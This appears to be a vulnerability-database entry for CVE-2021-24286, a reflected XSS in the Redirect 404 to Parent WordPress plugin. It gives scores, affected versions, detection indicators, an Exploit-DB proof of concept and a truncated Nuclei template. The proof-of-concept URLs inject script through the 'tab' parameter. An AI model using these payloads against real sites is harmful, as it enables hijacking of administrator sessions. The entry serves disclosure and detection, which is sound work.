CVE-2021-24286
Published 2021-05-14
Priority: P3 (43) · Severity: medium · CVSS 3.1 base score: 6.1
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploit: public exploit indexed (Exploit-DB, Nuclei)
EPSS: 13.94% (96.1 percentile)
The settings page of the Redirect 404 to parent WordPress plugin before 1.3.1 did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moove_agency | redirect_404_to_parent | >= 1.3.1 < 1.3.1 | 1.3.1 |
| mooveagency | redirect_404_to_parent | < 1.3.1 | 1.3.1 |
Detection & IOCs (extracted from sources)
- URL: wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
- URL: /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B
- Look for a reflected XSS payload in the `tab` parameter of the moove-redirect-settings admin page; the unsanitised value is echoed back in the HTTP response body.
- Detect requests to options-general.php with page=moove-redirect-settings and a tab parameter containing HTML/JS injection characters (e.g. a quote, style=, onanimationstart=).
- In the HTTP response body, the presence of both the unencoded XSS payload string and the string 'Moove redirect 404' confirms successful reflection and a vulnerable plugin version.
- The attack requires an authenticated session (admin login via /wp-login.php) before the XSS can be triggered on the settings page.
- The XSS is reflected (not stored), so exploitation requires tricking an authenticated admin into clicking a crafted link; it is not exploitable without user interaction.
- The vulnerability is fixed in plugin version 1.3.1; instances running 1.3.0 or earlier are affected.
CVSS provenance
- NVD (CVSS v3.1): 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- NVD (CVSS v2.0): 4.3 MEDIUM, AV:N/AC:M/Au:N/C:N/I:P/A:N
No detection rules found.
Exploit-DB
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
Source: exploitdb · 2021-09-29 · CVSS 6.1 · CVE-2021-24286 [MEDIUM]
---
```text
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286

1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
```
Nuclei
WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
Source: nuclei · CVSS 6.1 · CVE-2021-24286 [MEDIUM]
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
Template:
```yaml
id: CVE-2021-24286
info:
  name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in the settings page, potentially stealing administrator session cookies or performing administrative actions.
  remediation: Fixed in version 1.3.1
  reference:
    - https://wpscan.com/vulnerabilit
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/164328/WordPress-Redirect-404-To-Parent-1.3.0-Cross-Site-Scripting.html
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27